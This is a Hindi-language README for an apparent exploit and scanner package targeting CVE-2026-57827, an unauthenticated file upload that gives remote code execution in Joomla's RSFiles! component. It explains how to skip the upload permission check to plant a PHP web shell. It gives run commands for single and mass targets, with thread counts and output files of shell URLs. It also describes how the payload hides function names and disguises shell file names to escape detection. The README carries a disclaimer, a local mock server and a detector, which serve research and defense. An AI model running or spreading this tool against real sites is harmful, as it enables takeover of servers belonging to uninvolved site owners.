
बिना प्रमाणीकरण के फ़ाइल अपलोड → CVE-2026-57827 (RSFiles! Joomla < 1.17.12) हेतु RCE PoC। केवल अधिकृत सुरक्षा अनुसंधान उपयोग हेतु।
अस्वीकरण — केवल अधिकृत उपयोग। यह सुरक्षा अनुसंधान और रक्षात्मक परीक्षण के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट है। इसका उपयोग केवल उन्हीं प्रणालियों पर करने की ज़िम्मेदारी आपकी है जो आपकी हैं या जिनके परीक्षण की आपके पास स्पष्ट लिखित अनुमति है। बिना सहमति के तीसरे पक्ष के विरुद्ध दुरुपयोग अवैध है। ज़िम्मेदार प्रकटीकरण रुख के लिए SECURITY.md देखें।
Joomla के RSFiles! (com_rsfiles) घटक में CVE-2026-57827 के लिए एक्सप्लॉइट + स्टैंडअलोन डिटेक्टर, संस्करण < 1.17.12 (1.17.12 में ठीक किया गया, CVSS 9.8 / 10.0)।
फ्रंटएंड अपलोड दो कार्यों में विभाजित है:
rsfiles.checkupload — प्री-फ्लाइट गेट (अनुमति + एक्सटेंशन अनुमति-सूची)rsfiles.upload — लेखन विधि (कोई अनुमति जाँच नहीं, कोई फ़ाइल-प्रकार जाँच नहीं, कोई CSRF नहीं)लेखन कार्य को सीधे कॉल किया जा सकता है, जिससे प्री-फ्लाइट गेट को छोड़ा जा सकता है, जो
एक अनप्रमाणित हमलावर को सार्वजनिक फ़ोल्डर में एक निष्पादन योग्य .php फ़ाइल अपलोड करने
और उसे चलाने की अनुमति देता है → अनप्रमाणित RCE।
सभी मॉड्यूल एक ही निर्देशिका में होने चाहिए (वे एक-दूसरे को आयात करते हैं)।
python3 -m pip install -r requirements.txt # or just: pip install requests
python rsfiles_detect.py -t example.com
Host : example.com
RSFiles! : YES v1.17.11
Protocol : https
Status : VULNERABLE (below 1.17.12)
मल्टी-होस्ट:
python rsfiles_detect.py -f hosts.txt
python cve_2026_57827.py -t example.com
सफलता पर उपकरण शेल URL को उसके यादृच्छिक टोकन के साथ और कमांड आउटपुट प्रिंट करता है — वह आउटपुट ही RCE का प्रमाण है।
python cve_2026_57827.py -f targets.txt --threads 30 -o shells.txt --csv report.csv
# Terminal 1 — start the mock (vulnerable)
python mock_server.py 8000 1.17.11
# Terminal 2 — scan it
python rsfiles_detect.py -t 127.0.0.1:8000
python cve_2026_57827.py -t 127.0.0.1:8000
1.17.11 / 1.17.10 = भेद्य · 1.17.12 = पैच किया हुआ।
payload.py): प्रत्येक व्यवहार (गेट, अपलोड, exec, delete, list) एक छोटा फ़ंक्शन है; exec-फ़ंक्शन नाम base64-एन्कोडेड होते हैं ताकि system जैसे कच्चे नाम फ़ाइल बाइट्स में न दिखें।cache7f31.php) क्लासिक छिपे हुए डॉटफ़ाइल शेल नामों के बजाय।common.base_of() के माध्यम से।शैली सार्वजनिक Joomla घटक-एक्सप्लॉइट संग्रहों (जैसे incredibleindishell/joomla-vulnerabilities) और इस CVE के लिए RSJoomla/mysites.guru एडवाइज़री राइट-अप पर आधारित है।
MIT — LICENSE देखें। केवल अनुसंधान/रक्षा उपयोग।
| फ़ाइल | उद्देश्य |
|---|
cve_2026_57827.py | एक्सप्लॉइट + स्कैनर + CLI (प्रवेश बिंदु) |
rsfiles_detect.py | स्टैंडअलोन डिटेक्शन मॉड्यूल (कोई एक्सप्लॉइट नहीं) — इसका अपना CLI भी है |
payload.py | मॉड्यूलर, कॉम्पैक्ट PHP पेलोड निर्माता |
common.py | साझा HTTP क्लाइंट, कॉन्फ़िग और सहायक फ़ंक्शन |
mock_server.py | परीक्षण के लिए सुरक्षित स्थानीय सिमुलेशन |
| फ़्लैग | विवरण |
|---|
--threads N | समवर्तीता (डिफ़ॉल्ट 30) |
--proxy URL | प्रॉक्सी (Burp/ZAP) के माध्यम से रूट करें |
--timeout N | प्रति-अनुरोध टाइमआउट (सेकंड) |
--no-cleanup | अपलोड किए गए शेल को रखें (डिफ़ॉल्ट: RCE के बाद स्वतः-हटाना) |
-o FILE | RCE URL सहेजें |
--csv FILE | पूर्ण संरचित रिपोर्ट |
--debug / -v | विस्तृत अनुरोध-स्तर लॉगिंग |